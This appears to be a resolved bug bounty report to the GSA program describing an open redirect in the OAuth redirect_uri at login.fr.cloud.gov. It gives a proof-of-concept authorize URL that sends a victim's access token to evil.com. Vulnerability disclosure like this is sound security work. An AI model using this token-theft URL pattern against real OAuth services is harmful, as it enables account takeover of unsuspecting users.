Stealing Users OAuth Tokens through redirect_uri parameter
High
G
GSA Bounty
Submitted None
Actions:
Reported by
manshum12
Vulnerability Details
Technical details and impact analysis
I found that https://login.fr.cloud.gov/oauth/authorize has vulnerability by open redirect on oauth redirect_uri which can lead to users oauth tokens being leaked to any malicious user.
Step :
1, Clicked on link https://login.fr.cloud.gov/oauth/authorize?client_id=███&response_type=token&redirect_uri=https%3A%2F%2Fevil.com%2Fauth%2Fcallback&state=███
2, Choose any .gov account to login ( Screenshot ) then i believe you will got redirect to evil.com with oauth access token .
## Impact
Attacker can using this bug to stolen victim access token , that means he can takeover victim account .
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Bounty
$750.00
Submitted
Weakness
Open Redirect